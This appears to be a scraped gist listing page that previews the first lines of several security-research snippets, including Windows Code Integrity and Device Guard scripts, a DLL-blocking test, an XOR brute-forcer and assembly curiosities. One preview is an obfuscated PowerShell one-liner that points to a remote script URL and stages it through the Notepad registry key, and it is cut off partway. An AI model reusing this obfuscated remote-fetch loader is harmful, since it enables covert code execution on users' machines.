This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
namespace BlockDllTest | |
{ | |
class Program | |
{ | |
static void Main(string[] args) | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <Windows.h> | |
#include <ImageHlp.h> | |
#include <strsafe.h> | |
#include "loaded_psp_drivers.h" | |
#include <set> | |
#include <string> | |
#include <algorithm> | |
#pragma comment(lib, "crypt32.lib") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; A minimal Mach-o x64 executable for OS X (also see below Mountain Lion version) | |
; | |
; $ nasm -f bin -o tiny_hello tiny_hello.s | |
; $ chmod +x tiny_hello | |
; $ ./tiny_hello | |
; Hello World! | |
; $ | |
; c.f. | |
; http://osxbook.com/blog/2009/03/15/crafting-a-tiny-mach-o-executable/ ( the original tiny mach-o executable ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Enable Required Windows Features | |
Enable-WindowsOptionalFeature -Online -NoRestart -FeatureName:Microsoft-Hyper-V-Hypervisor -All | |
Disable-WindowsOptionalFeature -Online -NoRestart -FeatureName: Microsoft-Hyper-V-Tools-All, Microsoft-Hyper-V-Services | |
Get-WindowsOptionalFeature -Online -FeatureName "IsolatedUserMode" | Enable-WindowsOptionalFeature -Online -NoRestart | |
# Enable DeviceGuard Security Flags | |
#reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f | |
New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard" -Name "EnableVirtualizationBasedSecurity" -PropertyType "DWORD" -Value 1 -Force | |
# Info Source: https://docs.microsoft.com/en-us/windows/device-security/device-guard/deploy-device-guard-enable-virtualization-based-security#use-registry-keys-to-enable-vbs-and-device-guard |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$s1 = (gwmi -List Win32_ShadowCopy).Create("C:\", "ClientAccessible") | |
$s2 = gwmi Win32_ShadowCopy | ? { $_.ID -eq $s1.ShadowID } | |
$d = $s2.DeviceObject + "\" | |
cmd /c mklink /d C:\scpy "$d" | |
New-CIPolicy -Level RootCertificate -FilePath C:\BasePolicy.xml -ScanPath C:\scpy -UserPEs | |
$s2.Delete() | |
Remove-Item -Path C:\scpy -Force | |
Set-RuleOption –option 3 –FilePath C:\BasePolicy.xml | |
ConvertFrom-CIPolicy C:\BasePolicy.xml C:\BasePolicy.bin | |
Move-Item C:\BasePolicy.bin c:\Windows\System32\CodeIntegrity\SIPolicy.p7b -force |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Ensure System.Security assembly is loaded. | |
Add-Type -AssemblyName System.Security | |
function ConvertTo-CIPolicy { | |
<# | |
.SYNOPSIS | |
Converts a binary file that contains a Code Integrity policy into XML format. | |
Author: Matthew Graeber (@mattifestation) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Set-Item Variable:\p 'Notepad';Set-Variable v5 'HKCU:\Software\Microsoft\Notepad';Set-Item Variable:\Ma 'https://gist.githubusercontent.com/invokethreatguy/0481730897e4c0db74f6596fcae223f9/raw/c2a3ebbfa3e7ffcfaf2d4ad2985a8ffd2dca3a4b/get-process.ps1';pushd;SI Variable:/3eT (.$ExecutionContext.InvokeCommand.GetCommand($ExecutionContext.InvokeCommand.GetCommandName('N*-O*',1,1),[Management.Automation.CommandTypes]::Cmdlet)-ComObje WScript.Shell);$Null=[System.Reflection.Assembly]::([System.Reflection.Assembly].GetMethods()|?{(Variable _ -Va).Name-like'L*ame'}|%{(GV _ -ValueOnl).Name}|Select -Fir 1).Invoke('System.Windows.Forms');Set-Variable A (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Member)[2].Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('G*-I*y',1,1))(Get-Variable v5).Value);@(@(((.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|Member)[2].Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('G*-I*y',1,1))HKCU:\Software\Microsoft\Notepad|Memb |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Collections.Generic; | |
using System.Diagnostics; | |
using System.Linq; | |
using System.Text; | |
namespace XORBruteForce | |
{ | |
class Program | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
gi{"name":"Overview","desc":"System Overview","controller_version":"5.10.12","modules":[{"id":"default:mega|status","module_id":"mega|status","restrictions":{"removable":false,"draggable":false},"config":{}},{"module_id":"internet-connection","config":{},"id":"dd5f7461-f8f0-4017-859c-3d9271b673bf"},{"module_id":"summary|wifi","config":{},"id":"13a78652-ad84-4fcb-943a-86929c638353"},{"module_id":"clients|freq-distribution","config":{"palette":"BLUE_GRADIENT_10"},"id":"c9626f4f-021f-4d46-b22d-86007570bac7"},{"module_id":"clients|top5|active","config":{"trafficType":"total"},"id":"36a9e071-132e-4b4a-baee-250449a6d44f"},{"module_id":"devices|uap|top5|channel-util","config":{"trafficType":"total"},"id":"9803f077-b9cd-4db0-b466-60d92fae2020"},{"module_id":"devices|uap|top5|active","config":{"trafficType":"total"},"id":"e6133049-cc56-44b3-a4c2-b0843912dac5"},{"module_id":"devices|uap|top5|client-count","config":{},"id":"d39f9c80-1827-4ba0-b573-3209789c56b5"},{"module_id":"summary|switching","config":{},"id":"5966437 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x83\xc0\x05\xc3" str; | |
#define REF_STRING(var) ((char*(*)())var)() | |
DECLARE_STRING(data1, "Hello, World!\n"); | |
DECLARE_STRING(data2, "Goodbye, World!\n"); | |
int main(int , char** ) |